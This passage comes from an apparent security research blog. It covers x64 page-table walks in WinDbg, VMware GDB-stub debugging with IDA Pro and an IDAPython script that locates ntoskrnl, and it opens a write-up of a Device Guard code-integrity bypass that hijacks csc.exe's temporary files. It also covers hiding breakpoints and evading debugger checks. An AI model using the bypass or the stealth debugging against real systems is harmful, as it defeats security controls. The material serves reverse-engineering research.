    It's worth noting at this point that paging structures other than those in the PML4 table contain a Page Size (PS) bit (bit 7). If this bit is set, then the current entry represents the physical page. This means that page sizes as large as 1GB can be supported, if the associated PDPTE indicates that it is a 1GB page by setting the PS bit. Otherwise, 2MB pages can be supported if the PS bit is set in the PDE structure. Not all processors support the PS bit being set in a PDPTE; therefore, not all processors will support 1GB pages.

    Moving along in our example, we can assume that the PS bit is not set in the PDPTE that we just referenced. So, we will look at the page frame number of this structure and multiply by the page size again to get the physical address of the next paging structure root.



    Figure 5: Our walk so far, from the CR3 register, through the PML4 and PDPT structures.

    Using the PFN stored in the PDPTE structure, we're able to locate the Page Directory paging structure, which is next in the hierarchy. As before, we use the next 9 bits (bits 29-21) of the original virtual address to get the index into this structure where our entry of interest (a PDE, in this case) resides. The PDE structure is defined similarly to the previous structures, as shown below.
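    A sketch along the same lines (same caveats as the earlier definitions); when the PS bit is set here, the entry maps a 2MB page instead of pointing to a Page Table:

    union PDE
    {
        struct
        {
            ULONG64 Present : 1;
            ULONG64 ReadWrite : 1;
            ULONG64 UserSupervisor : 1;
            ULONG64 PageWriteThrough : 1;
            ULONG64 PageCacheDisable : 1;
            ULONG64 Accessed : 1;
            ULONG64 Ignored1 : 1;
            ULONG64 PageSize : 1;         // if set, this entry maps a 2MB page directly
            ULONG64 Ignored2 : 4;
            ULONG64 PageFrameNumber : 36; // PFN of the Page Table (when PageSize = 0)
            ULONG64 Reserved : 4;
            ULONG64 Ignored3 : 11;
            ULONG64 ExecuteDisable : 1;
        };
        ULONG64 Value;
    };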


    Again, we can use the PFN member of this structure multiplied by the size of a page to locate the next, and final, paging structure that facilitates the translation - the Page Table. The next 9 bits (bits 20-12) of our original virtual address are the index into the Page Table where the associated entry (PTE) is located. This PTE structure is defined below, and once again has similar characteristics to its predecessors.
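    One more sketch, with the same caveats; at this level the Dirty and Global bits are meaningful and the PFN refers to the backing physical page itself:

    union PTE
    {
        struct
        {
            ULONG64 Present : 1;
            ULONG64 ReadWrite : 1;
            ULONG64 UserSupervisor : 1;
            ULONG64 PageWriteThrough : 1;
            ULONG64 PageCacheDisable : 1;
            ULONG64 Accessed : 1;
            ULONG64 Dirty : 1;            // set when the page has been written to
            ULONG64 PageAttributeTable : 1;
            ULONG64 Global : 1;           // survives TLB flushes on CR3 reloads
            ULONG64 Ignored1 : 3;
            ULONG64 PageFrameNumber : 36; // PFN of the backing physical page
            ULONG64 Reserved : 4;
            ULONG64 Ignored2 : 11;
            ULONG64 ExecuteDisable : 1;
        };
        ULONG64 Value;
    };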


    The PFN member of this structure indicates the real page frame of the backing physical memory. Because our example went the full depth of the paging structures, the size of a page frame is 4KB, or 0x1000. Thus, in order to get the location in physical memory where the backing page begins, we multiply the page frame number from the PTE by 0x1000 as we had been doing previously. The remaining 12 bits (bits 11-0) of the original virtual address are the offset into the physical page where the actual data resides. Had our example not used the full depth of the paging structures, and had instead used 2MB page sizes (stopping at the Page Directory level), that PDE would have contained the page frame number of interest, and we would have multiplied that number by the size of a page frame, which in that case would be 2MB or 0x200000. We would then add the offset into the page, which would be the remaining bits (bits 20-0) of the original virtual address since we did not need to use the usual 9 bits for indexing into a Page Table structure.
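    Putting the arithmetic together, here is a hedged C++ sketch of the full 4KB walk described above. ReadPhysicalQword is a hypothetical helper that reads 8 bytes of physical memory (something only a debugger, driver, or hypervisor can actually provide), and the present/page-size checks are reduced to a comment:

    typedef unsigned long long ULONG64;

    // Hypothetical helper: reads 8 bytes from a physical address.
    ULONG64 ReadPhysicalQword(ULONG64 physicalAddress);

    ULONG64 TranslateVirtualAddress(ULONG64 cr3, ULONG64 va)
    {
        const ULONG64 PfnMask = 0x0000FFFFFFFFF000ull; // bits 47-12

        // At each level: structure base + (9-bit index * 8 bytes per entry).
        ULONG64 pml4e = ReadPhysicalQword((cr3   & PfnMask) + (((va >> 39) & 0x1FF) * 8));
        ULONG64 pdpte = ReadPhysicalQword((pml4e & PfnMask) + (((va >> 30) & 0x1FF) * 8));
        ULONG64 pde   = ReadPhysicalQword((pdpte & PfnMask) + (((va >> 21) & 0x1FF) * 8));
        ULONG64 pte   = ReadPhysicalQword((pde   & PfnMask) + (((va >> 12) & 0x1FF) * 8));

        // Assumes every entry is present and the PS bit is clear at each level;
        // a real walk must check those bits and stop early for 1GB/2MB pages.
        return (pte & PfnMask) + (va & 0xFFF);
    }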



    Figure 6: Here we have a full traversal of the paging structures from CR3 all the way to the final PTE. We use the PFN from the PTE to calculate the backing physical page.

    Practical exploration with WinDbg

    We can use WinDbg to explore what this structure hierarchy looks like in practice. Windows does some things differently (such as per-process CR3 to keep the virtual address spaces of processes separate) and there are certain complexities that we will cover in a future article, but we will choose a simple example that demonstrates what we've just learned. 

    Attach an instance of WinDbg as a kernel debugger to the virtual machine or physical box of your choice to get started. Check out this article for instructions on how to do so.

    Once we've broken in, use the lm command to list the modules that have been loaded by the current process.


    We'll use the image base of ntdll.dll as our example. It's located at 0x00000000`771d0000. We can view the memory at that virtual address by using db (or dX, where X is your desired format specifier).


    Here we can see the signature 'MZ' as we would expect from a DOS header. But where are these bytes located in physical memory? There are two ways we can find out.

    The first way is the hard way - we can get the value stored in CR3 which gives us the beginning of our PML4 paging structure, and begin our manual walk like we described above.


    This means that the start of our PML4 table is located at physical address 0x187000. We can take a look at the physical memory at that location using !dq (or !dX, again where X is the format specifier you want to use). We're aligning on a quad-word because the size of each entry in any paging structure in 64-bit mode is 8 bytes.


    Here we see that we have one PML4E structure, with 0x00700007`ddc82867 as the value. For a paging structure entry, we know that bits 47-12 represent the page frame number of the next paging structure. So we extract those bits to get 0x7ddc82, then multiply it by the size of a page frame on this architecture (4KB) to get a physical address of 0x00000007`ddc82000.

    If we navigate to that physical address, let's see what we get.


    Sure enough, there are two PDPTE entries (or potentially more, off-screen, since there can be up to 512 listed) here in this PDPT that we've walked to. In order to figure out which PDPTE we need to reference, we'd need to refer to the 9 bits in the original virtual address that map to the PDPT (bits 39-30), which in the case of our example works out to 0x1. That means we want the second entry of the PDPT structure, at index 1.

    We can extract the page frame number from that PDPTE entry using the same bits we used in the last example (bits 47-12), resulting in 0x7d96b8. Let's multiply that number by 4KB, and see what we've got at that physical address.

    You may be wondering at this point: what's going on? Why is there nothing in the PD structure that was referenced by our PDPTE? Remember, not all memory is valid and mapped, so the fact that we are seeing a bunch of zero-value PDE entries isn't a surprise. It just means that those regions of virtual memory aren't currently mapped to a physical page. In order to get to the PDE we care about, we need to take the next 9 bits of the original virtual address as we did before, this time getting a value of 0x1b8 after extracting the bits. That will get us the index into the PD structure where our PDE of interest is located. We can navigate to that memory location now, remembering to multiply the index by the size of a paging structure entry, which is 8 bytes.

    That gets us 0x67e00007`d96b9867 as our PDE value. Once again, we extract the bits that are relevant to the page frame number, and we come up with 0x7d96b9.

    We can repeat the steps we've taken previously to multiply that page frame number by 4KB, add the PT index using the next 9 bits of the original virtual address (0x1d0 in this case), then navigate to the correct physical address.

    We've gotten the value 0xe7d00007`d9cc0025 for our PTE entry. We're almost there! We just need to do the same steps we've been doing one more time - extract the PFN from that value (0x7d9cc0), multiply by the size of a page (0x1000), but this time, we need to add the page offset (bits 11-0) from our original virtual address to the result. This should get us to 0x00000007`d9cc0000 since our page offset in this example was actually zero. Let's look at the memory!
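    For reference, the entire manual walk condenses down to a handful of WinDbg commands. This is a sketch of the session, using the addresses computed above ($$ begins a comment):

    kd> r cr3                                    ; $$ PML4 base -> 0x187000
    kd> !dq 187000                               ; $$ PML4E at index 0
    kd> ? (00700007`ddc82867 >> c) & fffffffff   ; $$ extract the PFN -> 0x7ddc82
    kd> !dq 7ddc82000 + (1 * 8)                  ; $$ PDPTE at index 1
    kd> !dq 7d96b8000 + (1b8 * 8)                ; $$ PDE at index 0x1b8
    kd> !dq 7d96b9000 + (1d0 * 8)                ; $$ PTE at index 0x1d0
    kd> !dq 7d9cc0000                            ; $$ the backing physical page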



    There's the header, just like we expected. That's a cumbersome amount of work, though, and we don't want to have to be doing that manually every time we try to translate an address. Luckily, there's an easier way.

    WinDbg provides the !pte command to illustrate the entire walk down the paging structures and what each entry contains. It is important to note, though, that the addresses of the paging structures are converted to virtual addresses before being displayed, so they will look different from the physical addresses we computed on our own, but they point to the same memory.


    You can see that WinDbg gives us the address of the paging structure used, what it contained, and the page frame number for each. You can verify that the PFN on the PXE (PML4E) entry matches up with what we calculated, too. The most important part of all of this information is the PFN that's within the lowermost entry, the PTE. In our case it's 0x7d9cc0.

    So, we can multiply that page frame number by 0x1000 to get 0x00000007`d9cc0000, and that should be the physical address of the DOS header of ntdll.dll! This checks out based on the manual calculations we did previously, but let's take a look again to make sure.


    And there it is! We can test this by editing the DOS header in WinDbg and seeing if those changes are reflected on the physical page.


    Let's check it out using the virtual address...


    ...and the physical address...


    And there you have it! We now know how to successfully walk the IA-32e paging structures to convert a virtual address into a physical address.

    Setup - VMM debugging using VMware's GDB stub and IDA Pro - Part 1

    By: Nemi
    10 July 2017 at 05:00
    Sometimes you'll run into a situation that you can't analyze with a traditional kernel debugger like WinDbg. One example is troubleshooting the runtime logic of PatchGuard (Microsoft's Kernel Patch Protection). In situations like this, you need to bust out the heavy tools. VMware has built-in support for remote debugging of virtual machines running inside it through a GDB stub. IDA Pro, the de facto disassembler that most reverse engineers have, includes a GDB debugger. Together these make for a very powerful combo.

    This article goes over how to set up VMware's GDB stub and how to connect to it using IDA Pro's GDB debugger.

    Requirements

    • A copy of VMware Workstation (free 30-day trial). I'll be using VMware Workstation 12.5.7 (build-5813279).
      • Unfortunately, VMware Player (entirely free for non-commercial use) does not expose the GDB stub interface.
      • You can use either the Linux or Windows build of VMware. I'll be using the 64-bit Windows build.
    • The IDA Pro application. I'm using IDA Pro x64 Version 6.95.160808.

    Optional, but preferred

    • A Windows operating system installed on your host and guest (VM). These do not have to be the same versions of Windows. My host and guest OS are both running Windows x64 10.0.15063 (Version 1703).
      • This can be any OS supported by VMware such as Ubuntu. 
      • The second part of this tutorial (loading kernel symbols) assumes you're running a Windows 64-bit VM (AMD64).

    Enabling the GDB stub within VMware

    1. Select the VM you wish to enable GDB stub debugging on within VMware.
      • VMs should be listed in the "Library" pane on the left of the GUI. If the "Library" pane is missing, you can restore it by selecting "View" then "Customize" and choosing "Library" (or hit F9).
    2. Ensure that the VM is currently not running. If it's currently active, power it off via the menu bar: "VM" then "Power" then "Shut Down Guest" (or Ctrl+E).
    3. Select "Edit virtual machine settings". Ensure that you are on the "Options" tab.
    4. Find the "Working directory" text field and copy the string to your clipboard. 'Cancel' out of the prompt.
    5. Go to the working directory.
    6. Right-click on the *.vmx file and "Open with" your favorite text editor. I'll be using Notepad++.
    7. Add one of the following lines to the end of the file, based on preference.
      • If your VM is 32-bit and you want to debug locally:
        debugStub.listen.guest32 = "TRUE"
      • If your VM is 64-bit and you want to debug locally:
        debugStub.listen.guest64 = "TRUE"
      • If your VM is 32-bit and you want to debug remotely:
        debugStub.listen.guest32.remote = "TRUE"
      • If your VM is 64-bit and you want to debug remotely:
        debugStub.listen.guest64.remote = "TRUE"
    8. The default port for the GDB stub is 8864 for 64-bit guests and 8832 for 32-bit guests. If you'd like to change what port the VMware GDB stub listens on (e.g. 55555), add one of the following lines to the file:
      • If your VM is 32-bit:
        debugStub.port.guest32 = "55555"
      • If your VM is 64-bit:
        debugStub.port.guest64 = "55555"
    9. If you want to start debugging immediately on BIOS load add one of the following lines to your file:
      • If your VM is 32-bit:
        monitor.debugOnStartGuest32 = "TRUE"
      • If your VM is 64-bit:
        monitor.debugOnStartGuest64 = "TRUE"
    10. To make it difficult to detect breakpoints that you've set using GDB, it's strongly recommended to add the following option too:
      • debugStub.hideBreakpoints = "TRUE"
      An important thing to note is that this option is restricted by the number of hardware breakpoints available to the processor (usually 4).
    11. Save the *.vmx file via "File" and then "Save" from the menu bar (or hit Control+S). Here's a copy of the contents of my *.vmx file:
      Close the file.
    12. Run the VM corresponding to the *.vmx file you just edited. Validate that the GDB stub is currently running by opening the vmware.log file in the same directory as the *.vmx file:
      If you see a message from "Debug stub" that tells you VMware is "listening" for a debug connection on a certain port number, you're in a good state.

      If you are missing that log line or have an error, ensure that your *.vmx file has the appropriate settings. Remember: you must edit the *.vmx file when the Virtual Machine is off or your changes may be lost.

    Configuring the GDB debugger within IDA Pro

    1. Launch the 64-bit version of IDA Pro if you're debugging a 64-bit VM and the 32-bit version of IDA Pro if you're debugging a 32-bit VM.
    2. Skip the "Welcome" dialog (by hitting "Go") and go to the main disassembler window. Choose "Debugger" and then "Attach" and finally "Remote GDB debugger" from the menu bar.
    3. Enter the appropriate "Hostname" and "Port". These were set up by you during steps 7 and 8 of the "Enabling the GDB stub within VMware" section. Furthermore, these can be validated in the vmware.log file (this was done in step 12 of the same section). Then hit "Debug options".
    4. In the "Debugger setup" window, select "Set specific options".
    5. Ensure that the right "Processor" is set in the drop down box. If you're debugging a 64-bit edition of Windows (AMD64), select "Intel x64". If you're debugging a 32-bit edition of Windows (X86), select "Intel x86".
      Select 'OK' in the "GDB configuration" window. And then select 'OK' in the "Debugger setup" window. Finally, select 'OK' in the "Debug application setup" window.
    6. The VM will become suspended and a green "play" button will appear. At this point, IDA should bring up a window with the title "Choose process to attach to".
      Select "<attach to the process started on target>" and hit 'OK'.
    7. If you see this window, that means you're almost done.
    8. Select "Debugger" and then "Manual memory regions" from the menu bar.
    9. Inside of the "Manual memory regions" tab, right click and select "Insert" (or just press "Insert" on your keyboard).
    10. A new window will pop up. Enter in the "Start address" as 0 and the "End address" as -2. Make sure the right "segment" is selected (e.g. 64-bit segment for 64-bit VM debugging) and hit 'OK'.
      • This essentially maps all virtual memory from 0 to 0xFFFFFFFFFFFFFFFE (on x64).
      • "-1" is not an acceptable boundary for IDA Pro as the "End address".
    11. Find the "General Registers" window and find the IP register (RIP on x64, EIP on x86).
      • If the "General Registers" window is gone, select "Debugger" and then "Debugger windows" and finally "General Registers" from the menu bar.
    12. Right click on the IP register and select "Jump" from the context menu that appears.
    13. Your memory view will become synched to the IP register. If there are raw bytes listed and not code, don't panic. Place your cursor on the address of the IP and hit "C".
    14. Congratulations. At this point you've successfully set up VMware's GDB stub and IDA Pro's GDB debugger. You are now able to debug the VM and apply breakpoints through the IDA Pro GUI just as you would normally through a kernel debugger. Most of the functionality of the GDB debugger can be accessed through the "Debugger" menu bar.
    • This type of debugging is transparent to the kernel and therefore "debugger" checks like "KdDebuggerEnabled" and "KdDebuggerNotPresent" will not trigger. Furthermore, if the debugStub.hideBreakpoints option was enabled, breakpoints (up until the hardware maximum) will not make any inline code edits!

    Final thoughts

    Ultimately, the GDB debugger is not very useful without kernel symbols being loaded. One option, albeit a naive one, is to attach WinDbg as a kernel debugger while running IDA's GDB stub in the background. A tutorial on how to setup kernel debugging using WinDbg and VMware can be found here. You are then able to use the symbolic data that is provided from WinDbg to power debugging in IDA's GDB debugger. This is very cumbersome and has many disadvantages such as not being able to avoid kernel debugger checks.

    Luckily, there is a better way. In the second part of this series, we'll discover how to load kernel symbols in IDA Pro's GDB debugger.

    Loading kernel symbols - VMM debugging using VMware's GDB stub and IDA Pro - Part 2

    By: Nemi
    10 July 2017 at 05:48
    This article assumes you've read the first part of the series. In particular, at this point you should have successfully set up VMware's GDB stub and IDA Pro's GDB debugger. You should now be in a connected state and broken into IDA Pro's debugger GUI.

    Furthermore, the focus of this post is going to be exclusively on loading kernel symbols for 64-bit editions of Windows (AMD64). Different operating systems (and different architectures of Windows) require slight modifications to the article's logic.

    Where's Waldo ntoskrnl?

    The end goal

    The first and most important thing is to discover where the NT Kernel (ntoskrnl.exe) is loaded in memory since it's not at any fixed (static) address thanks to address space layout randomization (ASLR).

    We are then able to force IDA Pro to load symbol data (PDBs) at ntoskrnl's base address to have useful debugging information. From there, we can enumerate the linked list, nt!PsLoadedModuleList, to figure out where other kernel mode components are located. However, this isn't trivial. When you break into IDA Pro's GDB debugger, it's difficult to know what state you'll be in on any given processor. You might be executing code in a usermode process, or you might be busy servicing a system call. Additionally, you're further restricted to the functionality the GDB stub exposes.

    Enter the _KPCR

    On all architectures and versions of Windows, each processor maintains a control structure dubbed the _KPCR (Kernel Processor Control Region). This structure is massive and it can be used to infer exactly what the processor is doing. On Windows 10 (15063.0.amd64fre.rs2_release.170317-1834), the _KPCR is 0x6bc0 bytes large. It contains many kernel pointers that we can leverage to figure out exactly where the base of ntoskrnl is in memory. A link detailing the members of the _KPCR can be found here.

    This structure can be accessed through its virtual address or through the fs segment on x86 and the gs segment on x64. In fact, if you've done any reverse engineering of the Windows kernel, you should have seen many examples of Windows itself accessing members of the _KPCR through the segment selector.

    For example, when an int 3 (a software breakpoint; 0xCC) is executed by the processor, control is redirected by the CPU to a handler registered in the appropriate position of the IDT (Interrupt Descriptor Table). We'll touch more on this process later. In Windows, the handler for software breakpoints is nt!KiBreakpointTrap. Here is a snippet of the assembly code of the handler under AMD64:
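    The snippet below is a reconstruction based on the analysis that follows; only the two relevant instructions and their addresses are shown, with everything else elided:

    nt!KiBreakpointTrap:
        ...
        0x00000001401749FD    swapgs                ; swap to the kernel-mode gs base (_KPCR)
        0x0000000140174A00    mov     r10, gs:188h  ; r10 = _KPCR.Prcb.CurrentThread
        ...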

    In particular, at address 0x00000001401749FD we see a swapgs instruction. Since the gs selector means different things in user-mode (_TEB) and the kernel (_KPCR), this instruction is utilized to ensure that we're operating on the kernel-mode construct (_KPCR). Immediately following that instruction at address 0x0000000140174A00, we have an access of the gs segment with a mov r10, gs:188h. The astute reader will realize that upon execution of this instruction, r10 will contain the pointer from the _KPCR.Prcb.CurrentThread. This is discerned from the definition of the structure's members posted above. A breakdown of this process can be illustrated below:

    We don't know the _KPCR's exact linear address (it too isn't allocated at a fixed location), but we should be able to access it through the segment selector, just like the Windows kernel does. This approach might seem like the ideal one, but, unfortunately, we're further restricted by the functionality of the GDB stub. Let's see what the GDB stub exposes by issuing help:


    There are only three major commands available: help, r, and linuxoffsets. We've just executed help, and linuxoffsets isn't relevant to us since we're debugging a Windows kernel. The only other command is r. At first, r looks very useful to us. However, on closer examination, we can see that the GDB stub is unable to read arbitrary offsets off of the gs selector, e.g. the _KPCR.Prcb.CurrentThread from gs:188h by executing r gs:188h.

    At least executing r gs without an offset produces data:

    This command should get us the base of the gs selector. We then should be able to define a _KPCR structure at that location using IDA Pro. According to the GDB stub, though, our base is 0. If we go to that memory location in the "IDA View - RIP" tab by pressing 'G' and entering 0 in the "Jump to address" window, we don't see anything there:

    What changed from x86 to x64?

    If you ran this test on a VM running on an x86 (32-bit) version of Windows and substituted fs for gs, the base of the fs selector would not be 0. It would be a valid memory location. You would then have the address of the _KPCR and could continue on your merry way.

    Unfortunately, you're a sucker for pain and are following this tutorial to a T. In 64-bit (long) mode on x64, the cs, ss, ds, and es segment selectors have a zero-forced base address. gs and fs are the exceptions and have a non-zero base address. So, how is it possible that the base of the gs selector is 0 when Windows itself uses the segment selector to retrieve processor state?

    The answer is in the model-specific registers, MSRs. MSRs are per-processor registers that can be read via rdmsr and written via wrmsr instructions. On x64, the IA32_GS_BASE (0xC0000101) and IA32_KERNEL_GS_BASE (0xC0000102) MSRs are used for storage of the base address of the gs selector. swapgs was introduced to exchange the address of the current gs base register with the value contained in the IA32_KERNEL_GS_BASE MSR.

    This means that we could, theoretically, read the IA32_GS_BASE MSR if we're executing code in CPL0 (ring0/kernel-mode). This would get us the base address of the gs segment. However, that's not directly possible through the VMware GDB stub. There is no support for reading or writing to MSRs directly.

    A shimmer in the shadows

    Nevertheless, through persistence, we come up with an approach that plays nicely given our constraints. There are multiple ways to skin a cat and this approach may not be the most elegant solution, but it should work nicely for all x64 Windows kernels.

    The basic idea is to leverage the IDT, the interrupt descriptor table, to find a symbol that's in the address space of ntoskrnl. We can access the idtr, a register that houses the IDT, through the GDB stub:

    Once we have the base of the IDT, in our case 0xfffff802c4850000, we can access the first entry of the IDT. This should resolve to a symbol within ntoskrnl (nt!KiDivideErrorFault):

    From there, we can walk kernel memory backwards until we get to a valid PE header. Since the symbol is contained within ntoskrnl's address space, the first valid PE header should belong to ntoskrnl:


    Figure 1: Layout of kernel memory. 

    Writing an IDA script using IDAPython

    It'd be nice to programmatically implement the algorithm described above so we don't need to manually go through it each time we're trying to discover the base address of ntoskrnl. We'll do this by writing a script for IDA Pro to run. I chose to do this with IDAPython instead of IDC (IDA's C-like bindings) because of the niceties that Python provides (like string manipulation).

    The basics

    We'll start by switching the input from "GDB" to "Python" in the "Output window". If your "Output window" is missing, you can restore it by selecting "Windows" and then "Output window" from the menu bar:


    We can see all the functionality exposed by IDAPython by executing the Python command dir() in the text box. If you try to do this, you'll see lots of output. It's easy to feel overwhelmed. Luckily, there exists ample documentation on the Hex-Rays website that can help us navigate these murky waters.

    I try to find useful things by searching for it first in the dir() listing. You can position your cursor in the "Output window" and press Alt+T to search for a keyword. To find the next occurrence, you can hit Ctrl+T. If this fails, I move on to the documentation.

    Sending a command to the GDB stub

    Our first task is to figure out how to send a command to the GDB stub. If you search for the "command" keyword  in the "Output window" you'll find something labeled "SendDbgCommand". Let's see what this function does by executing help(SendDbgCommand):

    It seems very relevant to us. Let's give it a try:

    Looks like it's working. This is the same output we received from the GDB stub when we issued the help command.

    Parsing the response from the GDB stub

    Now that we know how to send a command to the GDB stub, we need to issue a command to retrieve the contents of the idtr. We then parse and extract the base address from the resulting string.

    It's important to tell Python that we're working with an integer object by "casting" the string to an integer-type:
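    A sketch of that step in IDAPython (the exact formatting of the stub's r idtr response can vary, so the string slicing here is an assumption):

    response = SendDbgCommand("r idtr")
    # Example response: "idtr base=0xfffff802c4850000 limit=0xfff"
    idt_base = int(response.split("base=")[1].split()[0], 16)
    print("IDT base: 0x%x" % idt_base)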

    Easy!

    Getting the first IDT entry's handler

    We have the base of the IDT in idt_base. Our next task is to retrieve the first entry in the IDT. The IDT is effectively an array that contains 256 IDT entries (0-0xFF) on x64. The format of the IDT is dictated by the architecture of the processor (e.g. Intel x64). Each IDT entry on x64 takes the following form:
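    A sketch of that layout, as it is commonly documented for _KIDTENTRY64 (16 bytes per entry):

    typedef struct _KIDTENTRY64
    {
        USHORT OffsetLow;      // bits 15-0 of the handler address
        USHORT Selector;       // code segment selector
        USHORT IstIndex : 3;   // interrupt stack table index
        USHORT Reserved0 : 5;
        USHORT Type : 5;       // gate type (e.g. interrupt gate)
        USHORT Dpl : 2;        // descriptor privilege level
        USHORT Present : 1;
        USHORT OffsetMiddle;   // bits 31-16 of the handler address
        ULONG OffsetHigh;      // bits 63-32 of the handler address
        ULONG Reserved1;
    } KIDTENTRY64, *PKIDTENTRY64;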

    To get to the handler (e.g. where the processor moves control to when an interrupt occurs), the target address is built from the OffsetHigh, OffsetMiddle, and OffsetLow fields of this structure using the following algorithm: HandlerAddress = ((OffsetHigh << 32) + (OffsetMiddle << 16) + OffsetLow).

    We'll leverage the Dbg* commands to read virtual memory from IDAPython. Since we're extracting the first IDT entry, we can just read directly from the start of our idt_base:
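    A sketch of that read, again in IDAPython (DbgQword reads 8 bytes of virtual memory from the debuggee):

    # Read the 16-byte _KIDTENTRY64 at index 0 as two qwords and rebuild
    # the handler address from its three offset fields.
    entry_low  = DbgQword(idt_base)
    entry_high = DbgQword(idt_base + 8)
    offset_low    = entry_low & 0xFFFF
    offset_middle = (entry_low >> 48) & 0xFFFF
    offset_high   = entry_high & 0xFFFFFFFF
    handler = (offset_high << 32) + (offset_middle << 16) + offset_low
    print("Handler: 0x%x" % handler)   # nt!KiDivideErrorFault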

    This shows us that the handler for the first IDT entry (nt!KiDivideErrorFault) is loaded at 0xfffff802c27f4300. If we wanted to read the N'th IDT entry, we'd have to index into the array by adding 0x10, the size of a _KIDTENTRY64, times the location in the array (in this case N). So, to index into the 3rd IDT entry, we'd apply the following math: idt_entry = idt_base + (0x10 * 2).

    Finding the base address from a symbol within ntoskrnl

    First, we'll define a simple helper function that will align addresses to their page boundaries. This will help speed up our lookup because we know that the base address of ntoskrnl will be on a page boundary:
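    Something along these lines works (a sketch):

    PAGE_SIZE = 0x1000

    def page_align(address):
        # Clear the low 12 bits to snap the address down to its page boundary.
        return address & ~(PAGE_SIZE - 1)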

    We'll then create a very simple loop to walk memory backwards (on a page-aligned boundary) searching for the magical value 0x5A4D, commonly known as 'MZ' (IMAGE_DOS_SIGNATURE). This value signifies the start of the IMAGE_DOS_HEADER which is also the base address of an image:
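    A sketch of that loop, using DbgWord to read 2 bytes at a time:

    IMAGE_DOS_SIGNATURE = 0x5A4D  # 'MZ'

    address = page_align(handler)
    while DbgWord(address) != IMAGE_DOS_SIGNATURE:
        address -= PAGE_SIZE
    print("ntoskrnl base address: 0x%x" % address)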

    Voila! The base address of ntoskrnl is discovered at 0xfffff802c2680000.

    Creating the final version of the script

    After some refactoring and code tidying (including error checking), we produce a much better version of the script. This does the same thing as the commands we inserted in the IDAPython "Output window":

    Save a copy of the script to your local drive. We are then able to run it at any time by going to "File" and then "Script file..." in the IDA Pro GUI. A sample of the output is listed below:

    The important line appears on the bottom; the base address of ntoskrnl is displayed. It checks out with the work we did by hand too.

    Loading ntoskrnl at its base address

    We mustn't forget the final objective: loading kernel symbols. We're almost at the finish line. Let's tell IDA to load ntoskrnl at the base address our script found.

    First, we'll need to grab a copy of ntoskrnl on the VM. Don't use the version on your host as this may not match with what's on the VM. This'll be found in your guest's system directory:


    You might need to resume your VM if you're currently active in IDA's GDB debugger by selecting "Debugger" and then "Continue process" (or by hitting F9) from the menu bar.

    After you've pulled ntoskrnl from your VM, break into IDA's GDB debugger by selecting "Suspend". Now, we must load it by selecting "File" then "Load file" and finally "PDB file..."


    Find where you copied ntoskrnl to on your host and use the address that the script found:


    It'll take IDA at least a couple of minutes to fully finish the loading process. You can see IDA's progress in the bottom left corner:


    You'll know IDA's finished when the status changes to "AU: idle".


    Quick validation

    We should make sure that the symbols are loaded correctly. Navigate to "Jump" and then "Jump to address" (or press "G"). Enter PsLoadedModuleList (case sensitive) and hit "OK".


    From there, double click the address immediately to the right of the PsLoadedModuleList symbol. This takes you to the first entry in the list. 


    Each entry in this list is of type _LDR_DATA_TABLE_ENTRY. You might be familiar with this structure from usermode programming. It's also used in the kernel.

    We'll need to add the definition of the _LDR_DATA_TABLE_ENTRY to IDA's structures. Luckily, we have symbols loaded and this is a pretty straightforward process. 


    After the structure was added, you'll see a window similar to this. 


    Go back to the "Debug View". Impose the _LDR_DATA_TABLE_ENTRY structure on that memory region:


    Let's follow the FullName.Buffer field:


    And now let's convert this to a readable string:


    You should see the characters \SystemRoot\system32\ntoskrnl.exe. We did it!

    Final thoughts

    Now that symbols are loaded for ntoskrnl, it would be wise to iterate through the PsLoadedModuleList and load symbols for all the other kernel mode components. This can be scripted using IDAPython too; however, it's beyond the scope of this article.

    Cheers!

    Bypassing Device Guard with .NET Assembly Compilation Methods

    10 July 2017 at 11:08
    Tl;dr

    This post will describe a Device Guard user mode code integrity (UMCI) bypass (or any other application whitelisting solution for that matter) that takes advantage of the fact that code integrity checks are not performed on code that is compiled dynamically with csc.exe. This issue was reported to Microsoft on November 14, 2016. Despite all other Device Guard bypasses being serviced, a decision was made to not service this bypass. This bypass can be mitigated by blocking csc.exe but that may not be realistic in your environment considering the frequency in which legitimate code makes use of these methods - e.g. msbuild.exe and many PowerShell modules that call Add-Type.

    Introduction

    When Device Guard enforces user mode code integrity (UMCI), aside from blocking non-whitelisted binaries, it also only permits the execution of signed scripts (PowerShell and WSH) approved per policy. The UMCI enforcement mechanism in PowerShell is constrained language mode. One of the features of constrained language mode is that unsigned/unapproved scripts are prevented from calling Add-Type as this would permit arbitrary code execution via the compilation and loading of supplied C#. Scripts that are approved per Device Guard code integrity (CI) policy, however, are under no such restrictions, execute in full language mode, and are permitted to call Add-Type. While investigating Device Guard bypasses, I considered targeting legitimate, approved calls to Add-Type. I knew that the act of calling Add-Type caused csc.exe – the C# compiler – to drop a .cs file to %TEMP%, compile it, and load it. A procmon trace of PowerShell calling Add-Type confirms this:

    Process Name Operation  Path
    ------------ ---------  ----
    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.cmdline
    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.0.cs
    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
    cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
    cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.dll
    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP


    Upon seeing these files created, I asked myself the following questions:
    1. Considering an approved (i.e. whitelisted per policy) PowerShell function is permitted to call Add-Type (as many Microsoft-signed module functions do), could I possibly replace the dropped .cs file with my own? Could I do so quickly enough to win that race?
    2. How is the .DLL that’s created loaded? Is it subject to code integrity (CI) checks?

    Research methodology

    Let's start with the second question, since exploitation would be impossible if CI prevented the loading of a hijacked, unsigned DLL. To answer it, I needed to determine which .NET methods were invoked when Add-Type was called. This was relatively easy to determine by tracing method calls in dnSpy. I quickly traced execution of the following .NET methods:
